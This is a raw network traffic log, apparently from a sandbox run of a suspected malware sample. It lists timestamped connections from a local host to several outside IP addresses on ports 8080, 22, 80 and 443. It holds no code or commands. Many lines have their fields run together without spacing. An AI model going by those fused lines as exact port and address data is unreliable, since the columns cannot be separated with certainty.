                                                                                                    Feb 10, 2024 16:17:19.093445063 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093458891 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093482971 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093491077 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093513012 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093532085 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093555927 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093589067 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093632936 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093677998 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093743086 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.097688913 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.098705053 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:19.104666948 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.104749918 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.134751081 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.134855032 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.154872894 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:19.175440073 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.175513983 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.197005987 CET497418080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.306102991 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.306175947 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:19.308706999 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.308805943 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.308844090 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.308866024 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.308892965 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.308932066 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.308955908 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309082985 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309103966 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309150934 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309182882 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309205055 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309231043 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309254885 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309343100 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309390068 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309413910 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309458017 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309465885 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309489012 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309509039 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309525013 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309545040 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309561014 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309591055 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309631109 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309649944 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309663057 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.309679031 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.309717894 CET808049738185.119.118.59192.168.2.4
Feb 10, 2024 16:17:19.309732914 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.309741974 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.309752941 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.309767008 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.309813976 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.309834003 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.309854984 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.309874058 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.309899092 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.309920073 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.309936047 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.309969902 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.310024977 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.350013971 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.350053072 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.350075006 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.350095034 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.390662909 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.390711069 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.412199974 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.412400961 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.412488937 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.468159914 CET  49742  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:19.516968012 CET  22     49740  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.517008066 CET  22     49740  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.517055035 CET  22     49740  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.517244101 CET  49740  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:19.523828030 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.523878098 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.523921967 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.523966074 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524072886 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524116993 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524162054 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524204016 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524235964 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524260044 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524305105 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524419069 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524466038 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524586916 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524674892 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524755955 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524801970 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524904013 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524950981 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.524992943 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525051117 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525096893 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525145054 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525190115 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525233030 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525278091 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525324106 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525368929 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525412083 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525454998 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525500059 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525542974 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525584936 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525626898 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525672913 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525718927 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525764942 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.525814056 CET  8080   49738  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.531280041 CET  49737  80     192.168.2.4      208.95.112.1
Feb 10, 2024 16:17:19.541733027 CET  49740  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:19.576766968 CET  49738  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.627262115 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.627897024 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.628362894 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.643778086 CET  80     49737  208.95.112.1     192.168.2.4
Feb 10, 2024 16:17:19.643842936 CET  49737  80     192.168.2.4      208.95.112.1
Feb 10, 2024 16:17:19.651181936 CET  49743  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:19.651241064 CET  443    49743  149.154.167.220  192.168.2.4
Feb 10, 2024 16:17:19.651319027 CET  49743  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:19.660928011 CET  49743  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:19.660964012 CET  443    49743  149.154.167.220  192.168.2.4
Feb 10, 2024 16:17:19.675952911 CET  22     49742  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.676095009 CET  49742  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:19.681122065 CET  49742  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:19.791336060 CET  22     49740  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.791517973 CET  49740  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:19.843832970 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.843871117 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.843893051 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.843914986 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:19.844069958 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:19.881942034 CET  22     49742  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.883831978 CET  49742  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:19.886260986 CET  22     49742  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.886493921 CET  22     49742  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.936163902 CET  49742  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:19.998719931 CET  22     49740  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.998800993 CET  22     49740  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:19.999063015 CET  49740  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:20.059273958 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.059345007 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.059391975 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.059437990 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.059484005 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.059529066 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.059564114 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.059571981 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.059616089 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.059741974 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.085036993 CET  443    49743  149.154.167.220  192.168.2.4
Feb 10, 2024 16:17:20.085105896 CET  49743  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:20.089147091 CET  22     49742  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:20.089283943 CET  49742  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:20.089510918 CET  49743  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:20.089530945 CET  443    49743  149.154.167.220  192.168.2.4
Feb 10, 2024 16:17:20.089770079 CET  443    49743  149.154.167.220  192.168.2.4
Feb 10, 2024 16:17:20.103542089 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.103727102 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.139115095 CET  49743  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:20.182172060 CET  49743  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:20.207144022 CET  22     49740  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:20.207628012 CET  49740  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:20.229904890 CET  443    49743  149.154.167.220  192.168.2.4
Feb 10, 2024 16:17:20.274797916 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.274871111 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.274916887 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.274965048 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275013924 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275032997 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.275058985 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275182962 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.275481939 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275561094 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275612116 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275655985 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275722027 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.275727034 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275773048 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275818110 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275846004 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.275863886 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275887012 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.275907993 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275918007 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.275954962 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.275974035 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.276000977 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.276005030 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.276045084 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.276088953 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.276099920 CET  49741  8080   192.168.2.4      185.119.118.59
Feb 10, 2024 16:17:20.299137115 CET  22     49742  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:20.299218893 CET  22     49742  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:20.299271107 CET  22     49742  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:20.299348116 CET  49742  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:20.301719904 CET  49742  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:20.318897963 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.416090965 CET  22     49740  138.68.79.95     192.168.2.4
Feb 10, 2024 16:17:20.416420937 CET  49740  22     192.168.2.4      138.68.79.95
Feb 10, 2024 16:17:20.491336107 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491415977 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491461992 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491502047 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491545916 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491588116 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491632938 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491682053 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491724014 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491765976 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491807938 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491852045 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491893053 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491935968 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.491977930 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492022038 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492063046 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492105961 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492149115 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492192984 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492234945 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492278099 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492320061 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492362976 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492408037 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492449045 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492491007 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492532969 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492574930 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492624998 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492666960 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492707968 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492749929 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492793083 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492835999 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492877960 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492919922 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.492961884 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493004084 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493045092 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493088007 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493132114 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493172884 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493215084 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493257046 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493299007 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493343115 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493386030 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493427038 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493470907 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.493516922 CET  8080   49741  185.119.118.59   192.168.2.4
Feb 10, 2024 16:17:20.496109009 CET  49739  80     192.168.2.4      208.95.112.1
Feb 10, 2024 16:17:20.496886969 CET  49744  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:20.496927023 CET  443    49744  149.154.167.220  192.168.2.4
Feb 10, 2024 16:17:20.497072935 CET  49744  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:20.501995087 CET  49744  443    192.168.2.4      149.154.167.220
Feb 10, 2024 16:17:20.502017975 CET  443    49744  149.154.167.220  192.168.2.4
Feb 10, 2024 16:17:20.543448925 CET  22     49742  138.68.79.95     192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.543584108 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.545486927 CET497418080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:20.611521006 CET8049739208.95.112.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.611609936 CET4973980192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:20.663587093 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.663784027 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.691998005 CET44349743149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.692172050 CET44349743149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.692562103 CET49743443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.695668936 CET49743443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.748964071 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.749596119 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.749793053 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.871381998 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.871464014 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.872169018 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.920857906 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.920958042 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.923152924 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.923166990 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.923585892 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.955322027 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.955614090 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.967243910 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.007571936 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.049902916 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079830885 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079869986 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079894066 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079915047 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079936981 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079957962 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.080051899 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.080053091 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.080053091 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.082401037 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:21.084126949 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.084172010 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.084239960 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.084604025 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.084623098 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.161072969 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.161575079 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.297418118 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.297563076 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:21.403270960 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.403456926 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.473133087 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.473311901 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.473371983 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.473900080 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.509809017 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.511885881 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.511945963 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.608808041 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.608882904 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.612914085 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.818342924 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818381071 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818403006 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818423033 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818444967 CET2249742138.68.79.95192.168.2.4
